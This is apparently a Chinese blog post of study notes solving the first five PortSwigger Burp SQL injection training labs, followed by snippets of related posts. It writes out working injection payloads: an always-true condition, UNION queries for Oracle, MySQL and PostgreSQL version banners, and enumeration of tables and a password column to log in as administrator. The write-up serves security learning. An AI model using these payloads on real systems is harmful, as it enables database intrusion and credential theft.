Burp靶场sql注入学习笔记1

最新推荐文章于 2025-07-28 01:05:08 发布
原创 最新推荐文章于 2025-07-28 01:05:08 发布 · 961 阅读 · 19 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#sql #学习 #笔记

1.SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

网页提示网站的sql语句是这样

找到注入点为url

根据给的查询语句构造payload

' and released=0--

完成题目需要找到未上架商品

或者使用payload也可以找到所有商品包括未上架的

' or 1=1--+ 

2.SQL injection vulnerability allowing login bypass

题目叫我们以管理员的身份登录应用程序

在页面右上角发现my account,点击后发现出现登录界面

密码输入单引号时发现报错,应该是有做过滤或者确实存在sql注入

尝试使用万能密码登录

登录成功

但是经过尝试后面的注释符用“#”就是不行,可能是这个数据库不支持#作为注释符或者是#因为某种限制或者过滤没有正确传输到sql语句中

3.SQL injection attack, querying the database type and version on Oracle

这题的数据库是Oracle

想要查找数据库的版本信息,可以使用union注入

首先判断回显列数,在order by 2时发现回显成功,3时失败,说明回显列数为2

Oracle数据库查看版本信息的语句是select banner from v$version

同时也要注意在对Oracle数据库注入中,union的占位通常使用NULL不使用数字,使用数字可能发生错误,因为其要求要和union前面查询的字段类型的类型一致,所以大多使用NULL

Oracle数据库有个特点,就是每个查询语句后面都要跟一个表,所以就出现了一个表叫做dual,这个表主要用于当我们执行函数或者做一些计算时不用查询某个表的情况下使用,这时候我们就可以from dual这个表来让我们的查询语句后面有个表跟着,这里的注入也需要利用这个表

那么我们可以构造payload为

a'union select null,banner from v$version--+

输入后成功拿下

4.SQL injection attack, querying the database type and version on MySQL and Microsoft

注入点一样,同样判断出回显列数为2

查询操作系统发行版的sql语句是select @@version;

那么我们就可以构造payload为

a'union select 1,@@version--+

5.SQL injection attack, listing the database contents on non-Oracle databases

本关要求我们得到一个保存用户名和密码的表并用管理员账号登录

在使用union注入时,数字1和2不起效果,应该不是sql数据库

使用语句 g‘union select ’null‘,banner from v$version--+报错,说明也不是Oracle数据库

使用语句g'union select 'null',version()--成功,说明是PostgreSQL数据库

相较于mysql的SQL注入

查数据库名

        select database等于select current_database()/current_catalog

查表名

        select table_name from information_schema.tables where table_schema='xxx'等于

        select relname from pg_stat_user_tables

查列名

和mysql数据库基本一样

select column_name from information_schema.columns where table_name='xxx'

查数据

也和mysql数据库基本一样

select 列 from 表

爆数据库名

使用payload

g'union select 'null',current_database()--+

爆表名

使用payload

a' union select 'null',relname from pg_stat_user_tables--+

爆列名

使用payload

a' union select 'null',column_name from information_schema.columns where table_name='users_zaxmws'--+

爆数据

使用payload

a' union select 'null',password_qtogxw from users_zaxmws--

在使用第二个密码zpig65lblzxvx8jddoi4时成功登录管理员账户

BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6610
BurpSuit官方实验室靶场-SQL注入通关记录。
burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1538
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
BurpSuite官方实验室】SQL联合注入
weixin_52137383的博客
03-23 5154
1.Determining the number of columns required in an SQL injection UNION attack To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out: How many columns are being r
(一)SQL注入实例
weixin_43047908的博客
04-09 2560
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 6172
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
Burp靶场SQL注入学习笔记3
Tonight_Fantasy的博客
04-04 960
本关还是需要获得users表内的账户和密码,但是变成了盲注根据提示,这题的注入点在cookie而不是在url上修改cookie的值页面正常再次修改cookie页面也正常回显,但是登录信息没了那么我们就可以根据这个welcome back来判断SQL语句是否为真既然知道了我们的目标列就是users表里的password,那么就直接爆破吧先判断密码长度使用payload在小于20时没有回显welcome back那么密码长度应该就是20爆数据,配合burp里的intruder模块。
burp靶场--sql通关
2401_89268757的博客
01-12 2148
burp靶场超详细解题过程
burp靶场sql注入通关—上
Zqinglele的博客
04-30 1919
'+union+select+'abc','def'+from+dual-- 没有报错说明两列都是字符型。1.这关要确定该表的名称及其包含的列,然后检索表的内容以获取所有用户的用户名和密码,并以管理员用户身份登录。'+union+select+'abc','def'-- 不报错,说明有两列。'+union+select+'abc','def'%23 不报错。'+union+select+'abc','def','ghi'%23 报错。
burp靶场通关教程1
逍遥小哥的博客
10-12 1676
因为这是个普通用户的凭据,这里显示false,那么我们访问管理页面把后面的admin=false粘上去 并改为true(如果有admin=就不用粘贴了,我这访问admin管理面本cookie里面没有admin=false)我们先访问robots.txt 这里提示里面存在管理面板的路径(没有做鉴权,通过不受保护的管理功能这个提示,应该直接访问管理面板路径就可以删除carlos用户了)第一这个--是注释,其次为什么要给administrator后面加单引号,因为这是字符串要闭合,不闭合就报错了。
Lab4_ SQL injection attack, querying the database type and version on MySQL and Microsoft
weixin_53797419的博客
02-06 498
本文为burpsuit官方实验室SQL注入系例第四关,查询 MySQL 和 Microsoft 的数据库类型和版本
portswigger靶场sql注入(一)
wzhwzh123321的博客
01-26 702
portswigger靶场sql注入
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 4262
SQL注入SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
PortSwigger靶场SQL injection attack, querying the database type and version on MySQL and Microsoft通关指南
最新发布
m0_65361643的博客
07-28 705
回顾一下SQL 注入的类型SQL 注入是一种常见的网络安全漏洞,攻击者通过在应用程序的输入字段中插入恶意的 SQL 代码,从而干扰应用程序对其数据库的查询。该SQL 注入应该是带内(In-bandSQL 注入,带内 SQL 注入是最常见也是最直接的类型,攻击者可以使用相同的通信渠道发送攻击和接收结果。猜测是url注入类型,带内注入的关键是让参数触发数据库的 “异常响应”,从而暴露注入点。通过常量测试成功,证明了union的可行性,那么我们就可以以此来获取数据库信息,成功获取版本号。
Lab3_ SQL injection attack, querying the database type and version on Oracle
weixin_53797419的博客
02-06 620
本文为burpsuit官方实验室sql注入系列第三关,查询oracle数据库的类型和版本
Portswigger sql注入
arcuied
12-22 1423
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
SQL注入-盲注 Burp盲注方法
HAKUNAMATATATTA的博客
09-04 951
什么是盲注?有时目标存在注入,但在页面上没有如何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。
使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件
dzqxwzoe的博客
03-19 2429
每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤懒人鹅上线,准备搞一个sql测试的插件本篇文章代码量大,基础可以去看上一篇。
bp靶场---SQL注入第三关(oracle)
m0_72471814的博客
01-08 1108
传送门。
BurpSuite学院靶场系列(一)| SQL注入
qq_45203884的博客
06-09 1426
摘要:本文记录了使用Yakit工具通关BurpSuite靶场的实战过程,涵盖多种SQL注入技术。从基础的WHERE子句注入(如'or 1=1')、登录绕过(administrator'--),到UNION攻击确定列数、查询数据库版本,再到盲注获取管理员密码(通过布尔盲注判断密码长度和字符)。针对不同数据库(Oracle/MySQL/PostgreSQL)展示了特定查询方法,如Oracle使用all_tables视图。文章通过具体SQL语句和Yakit截图,系统演示了Web安全中的SQL注入攻击技术链。
mysql in sql注入_在 SQL 注入攻击中检查数据库
weixin_36431489的博客
01-27 542
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy >>Examining the database >>Examining the database in SQL injection attacks...当利用 SQL 注入利用时,收集数据库本身的信息通常是必要的。这包括数据库软件的类型和版本,还包括数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值